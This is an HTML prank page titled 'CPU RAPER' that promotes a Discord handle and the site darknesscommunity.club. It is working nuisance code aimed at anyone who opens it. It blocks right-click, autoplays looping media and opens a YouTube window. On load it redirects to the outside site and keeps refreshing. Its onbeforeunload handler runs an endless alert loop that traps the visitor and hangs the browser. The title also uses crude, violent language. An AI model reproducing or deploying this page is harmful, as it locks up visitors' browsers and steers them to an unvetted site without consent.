<html oncontextmenu="return false">
	<head>
		<title>CPU RAPER</title>
		<meta charset="utf-8">
		<meta name="description" content="1110111100011100000100001111011001010110010000110010111000101101000011011101001100100000100110001100
1111100101000001111000111101101010010010110111110101001111110001010110010001010110001111000001000100
1011111010110111000011001100100001000010101011011100100101000100110000111000100010110000001011100110
1100011010011111000101011111110101100010111010100100001100111110011000010110011000100001111011000100
0110011101011101000101010100000000111001110111001010001010010011111010001100100011010101011111111111
0100001011011111001000101110011011111101001100010111111100011101111011111111111100101011000000111101
0101111010000100100111001000001000101000010011111001110001101001000000001001110111110100000101011101
0110100111110010010111001100011000110101100001010110110110111110111100011011110111101111110100110110
0111000101010111101011000100001000101110101101011000010001000101100111101010110011100001000110010011
1100011001111010001101011100101000101010001110111011100011010011110011111011010111010000000010100101
0011111001001000000100110110101110011100011010100001000010100001100000001000010011011111110110100001
0000101101101111100011000000100110000101001011101000110100001110101010111010010110110010010110101100
1111011101111111001011100100110010111011011010110101100101001101000111001100100111101101010001111001
1110001101010011011101101010010100110100001100011010110000100101101111111001101100010111100111010001
0001110110011001001101111010101101100001100110001111101101111001001001101101100101000110101110011000
1110000110000011100000000100010101000110101111000100001111100110101100101111111110001110001111011001
1101111110110010001001010100010010001001010001011000010001100001010011010110000001010101000111101011
1001000100110010110001001001010011011101010101011000011100000100101010101001100001000011001001000001
1000001110110011011001111111010010011011001000010101010110001001000000000111100010011000111110100110
1111000100010000011001101000100100110000111110011110001100101010011111101100110000000001000101111100
1010110100110010101001010111001000010011110111011000001011001100000101001110111101000111001110111001
0011001101101011110110000110001001000001000100001110011000100001010100110100011001101011100001010111
1101010100101011011001101101100011100011001011010100110110011011000110011001100000000110110101101010
1100111100011010001110110111000001101100010000011110011010001100001110111010100101010110000111101010
0010101111100110011111100001100101110100110000000110101101111110101011110101011011100000010010001001
1110011111101011000100110100101011011000100011101110010000001010011100101110111011110010100100001010
1111010111100101000001000111100101010001011010010100010100101111101110010001001111101100001011011101
0010110010110100111000001000010111010011001101111001001000110000110011000010000000010100111100010011">
		<audio loop="loop" autoplay="true">
            <source src="polishcow.mp3" type="audio/mp3">
        </audio>
		<center>
    		<marquee direction="right" behavior="alternate"><h1>Discord: TERROR#1337</h1></marquee>
    		<img src="polishcow.gif" alt="Polish cow" />
		</center>
		<script>
		document.onmousedown=disableclick;
		function disableclick(event)
		{
			if(event.button==2)
			{
				return false;    
			}
		}
		</script>
		
		<style>
		video {
			position: fixed;
			top: 50%;
			left: 50%;
			min-width: 100%;
			min-height: 100%;
			width: auto;
			height: auto;
			z-index: -100;
			transform: translateX(-50%) translateY(-50%);
			background-size: cover;
			transition: 1s opacity;
		}

		.textbox {
			margin-top: 5%;
			margin-left: 0%;
			margin-right: auto;
			color: rgba(255, 255, 255, 0.75);
			text-align: center;
			text-shadow: 1px 1px 1px #000;
			font-family: "Verdana";
			font-size: 24;
		}
		a:link {
			color: rgba(255, 255, 255, 0.75);
		}
		a:visited {
			color: rgba(255, 255, 255, 0.75);
		}
		a:hover {
			color: rgba(255, 255, 255, 0.75);
		}
		a:active {
			color: rgba(255, 255, 255, 0.75);
		}
		</style>
	</head>
	<script>
    //"use strict";
    window.open("https://www.youtube.com/watch?v=rRPQs_kM_nw", "topFrame");
</script>
	<body oncontextmenu="return false" onload="location.href='https://www.darknesscommunity.club/', load();">
		<video autoplay="" loop=""> 
			<source src="polishcow.mp4" type='video/mp4'>
		</video>
		<meta http-equiv=”refresh” content="5" />
		<script>window.onbeforeunload = function(){
  while (true) { alert("nope"); };
};
</script>
	</body>
</html>	
